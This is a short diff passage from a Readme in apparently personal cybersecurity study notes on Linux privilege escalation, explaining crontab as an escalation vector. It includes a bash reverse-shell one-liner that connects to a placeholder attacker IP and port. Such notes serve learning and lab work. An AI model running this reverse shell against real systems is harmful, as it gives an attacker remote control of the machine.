Berkanktk/CyberSecurity/More/Shells and Privilege Escalation/Privilege Escalation/Linux/Readme.md

 bash -i >& /dev/tcp/<IP_HERE>/<PORT_HERE> 0>&1
 ```

+You can also use the `crontab -l` command to list the current user’s crontab.

 Crontab is always worth checking as it can sometimes lead to easy privilege escalation vectors.
 The following scenario is not uncommon in companies that do not have a certain cyber security maturity level
 1. System administrators need to run a script at regular intervals.
 2. They create a cron job to do this